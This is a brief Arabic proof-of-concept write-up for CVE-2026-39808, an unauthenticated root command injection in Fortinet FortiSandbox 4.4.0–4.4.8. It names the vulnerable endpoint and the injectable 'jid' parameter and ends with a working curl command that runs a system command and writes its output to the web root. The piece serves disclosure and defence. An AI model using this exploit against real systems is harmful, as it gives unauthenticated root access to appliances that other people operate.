
إثبات مفهوم (PoC) لثغرة RCE بدون مصادقة في FortiSandbox عبر CVE-2026-39808
في نوفمبر 2025، تم اكتشاف ثغرة أمنية حرجة في FortiSandbox من Fortinet سمحت لمهاجم غير مصادق بتنفيذ أوامر في نظام التشغيل الأساسي بصلاحيات الجذر (root). تم إصلاح الثغرة وأُعلن عنها أخيرًا في أبريل 2026.
تؤثر هذه الثغرة على إصدارات FortiSandbox من 4.4.0 إلى 4.4.8.
اقرأ النشرة الأمنية الكاملة هنا.
تؤثر الثغرة على نقطة النهاية /fortisandbox/job-detail/tracer-behavior. يمكن حقن أوامر نظام التشغيل باستخدام رمز الأنبوب (|) في معامل GET المسمى jid.
في المثال أعلاه، تم توجيه المخرجات إلى ملف في جذر الويب بحيث يمكن استرجاعه لاحقًا.
يكفي أمر curl بسيط لتحقيق تنفيذ أوامر عن بُعد (RCE) بصلاحيات الجذر (root) دون أي مصادقة مسبقة:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"